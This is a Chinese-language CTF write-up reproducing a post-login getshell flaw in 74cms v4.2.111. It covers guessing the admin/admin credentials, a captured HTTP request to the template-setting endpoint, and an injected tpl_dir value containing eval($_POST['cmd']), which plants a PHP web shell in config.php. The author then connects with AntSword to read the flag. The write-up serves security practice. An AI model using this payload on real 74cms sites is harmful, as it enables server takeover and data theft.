骑士CMS01 74cms v4.2.111 后台getshell漏洞复现

题目地址:

青少年CTF训练平台 | 原中学生CTF平台 | 青少年CTF

进入环境

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第1张图片

 拉到最下面查看网站cms版本

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第2张图片

百度搜索

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第3张图片

 找个poc复现一下74CMS_v4.2.1-v4.2.129后台Getshell_FLy_鹏程万里的博客-CSDN博客

先进入网站后台/index.php?m=admin&c=index&a=login

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第4张图片

 输入账号aaa回显管理员账号不存在,试试admin

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第5张图片

 猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第6张图片

 302跳转登录成功密码就是admin

进入后台找到工具=>风格模板=>可用模板,抓包

GET /index.php?m=admin&c=tpl&a=set&tpl_dir=default HTTP/1.1
Host: 8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081/index.php?m=admin&c=tpl&a=index
Cookie: Hm_lvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664077379,1664087665,1664100554; Hm_lpvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664100567; td_cookie=1833576663; PHPSESSID=73nciph5rtj95ti9o99qd92781; think_language=zh-CN; think_template=default
Upgrade-Insecure-Requests: 1

修改tpl_dir的值为

','a',eval($_POST['cmd']),'

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第7张图片

然后访问/Application/Home/Conf/config.php

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第8张图片

 蚁剑连接找到flag

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现_第9张图片

 

 

你可能感兴趣的:(安全,web安全)